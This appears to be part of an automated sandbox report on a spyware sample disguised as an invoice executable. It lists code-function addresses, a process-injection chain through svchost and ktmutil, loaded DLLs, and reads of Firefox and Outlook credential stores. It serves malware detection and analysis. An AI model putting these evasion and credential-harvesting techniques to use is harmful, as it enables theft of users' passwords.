                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0040E473
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0042EEA3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B003E6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AFA352
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AC02C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AE0274
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B001AA
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AF81CC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A30100
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03ADA118
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AC8158
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AD2000
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A3C7C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A40770
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A64750
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A5C6E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B00591
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A40535
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AEE4F6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AF2446
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AF6BD7
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AFAB40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A3EA80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A429A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B0A9A6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A56962
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A268B8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A6E8F0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A4A840
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A42840
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03ABEFA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A4CFE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A32FC8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A82F28
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A60F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AB4F40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A52E90
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AFCE93
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AFEEDB
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AFEE26
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A40E59
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A58DBF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A3ADE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A4AD00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AE0CB5
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A30CF2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A40C00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A8739A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AF132D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A2D34C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A452A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AE12ED
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A5B2C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A4B1B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A7516C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03B0B16B
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AF70E9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AFF0E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AEF0CC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AFF7B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AF16CC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03ADD5B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AF7571
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AFF43F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A31460
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A5FB80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AB5BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A7DBF9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AFFB76
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03ADDAAC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A85AA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AEDAC6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AB3A6C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AFFA49
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AF7A46
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AD5910
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A49950
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A5B950
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A438E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AAD800
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AFFFB1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A41F92
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AFFF09
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A49EB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A5FDC0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AF7D73
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03A43D40
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AF1D5A
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AFFCF2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03AB9C32
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe | Code function: 8_2_04965043
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe | Code function: 8_2_04965092
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe | Code function: 8_2_0496701A
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe | Code function: 8_2_04966DF1
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe | Code function: 8_2_04966DFA
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe | Code function: 8_2_04985ACA
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe | Code function: 8_2_0496D75A
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032CA352
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032D03E6
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_0321E3F0
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032B0274
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032902C0
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_03200100
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032AA118
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_03298158
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032D01AA
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032C41A2
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032C81CC
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032A2000
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_03210770
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_03234750
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_0320C7C0
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_0322C6E0
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_03210535
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032D0591
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032B4420
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032C2446
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032BE4F6
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032CAB40
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032C6BD7
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_0320EA80
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_03226962
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032129A0
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032DA9A6
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_0321A840
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_03212840
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_031F68B8
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_0323E8F0
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_03252F28
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_03230F30
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032B2F30
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_03284F40
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_0328EFA0
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_0321CFE0
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_03202FC8
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032CEE26
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_03210E59
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_03222E90
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032CCE93
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032CEEDB
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_0321AD00
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032ACD1F
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_03228DBF
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_0320ADE0
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_03210C00
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032B0CB5
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_03200CF2
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032C132D
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_031FD34C
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_0325739A
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032152A0
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032B12ED
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_0322B2C0
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032DB16B
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_0324516C
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_031FF172
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_0321B1B0
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032C70E9
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032CF0E0
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032170C0
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032BF0CC
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032CF7B0
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_03255630
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032C16CC
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032C7571
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032AD5B0
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032D95C3
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032CF43F
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_03201460
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032CFB76
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_0322FB80
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_03285BF0
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_0324DBF9
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_03283A6C
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032CFA49
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032C7A46
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_03255AA0
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032ADAAC
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032B1AA3
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032BDAC6
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032A5910
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_03219950
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_0322B950
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_0327D800
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032138E0
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032CFF09
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032CFFB1
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_03211F92
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_03219EB0
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032C7D73
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_03213D40
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032C1D5A
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_0322FDC0
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_03289C32
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_032CFCF2
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_02791FB0
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_0278CEF0
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_0278CEE7
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_0278D110
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_0278B190
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_0278B188
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_02795610
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_027ABBC0
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_02793850
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_02FCE344
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_02FCE463
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_02FCCA9B
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_02FCD8C8
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 11_2_02FCE805
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: String function: 0021F8A0 appears 35 times
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: String function: 00216AC0 appears 42 times
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: String function: 0020EC2F appears 68 times
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: String function: 0328F290 appears 105 times
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: String function: 031FB970 appears 280 times
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: String function: 03245130 appears 58 times
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: String function: 0327EA12 appears 86 times
                Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: String function: 03257E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03AAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03A2B970 appears 275 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03A87E54 appears 100 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03ABF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03A75130 appears 57 times
                Source: ORIGINAL INVOICE COAU7230734290.exe, 00000002.00000003.2165458850.00000000035D3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs ORIGINAL INVOICE COAU7230734290.exe
                Source: ORIGINAL INVOICE COAU7230734290.exe, 00000002.00000003.2164578123.000000000377D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs ORIGINAL INVOICE COAU7230734290.exe
                Source: ORIGINAL INVOICE COAU7230734290.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@9/3@6/3
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_0023CE7A GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_0022AB84 AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_0022B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_0023E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_00236532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_0024C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Code function: 2_2_001F406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | File created: C:\Users\user\AppData\Local\Temp\aut6F38.tmp
                Source: ORIGINAL INVOICE COAU7230734290.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: ktmutil.exe, 0000000B.00000003.2690164539.0000000002DE3000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000003.2690164539.0000000002E04000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3402567248.0000000002E33000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3402567248.0000000002E0F000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 0000000B.00000002.3402567248.0000000002E04000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: ORIGINAL INVOICE COAU7230734290.exe | ReversingLabs: Detection: 68%
                Source: unknown | Process created: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe"
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe"
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe | Process created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe | Process created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"
                Source: C:\Windows\SysWOW64\ktmutil.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734290.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: ktmw32.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\ktmutil.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: Window Recorder | Window detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\ktmutil.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: ORIGINAL INVOICE COAU7230734290.exe | Static file information: File size 1212928 > 1048576
                Source: ORIGINAL INVOICE COAU7230734290.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: ORIGINAL INVOICE COAU7230734290.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
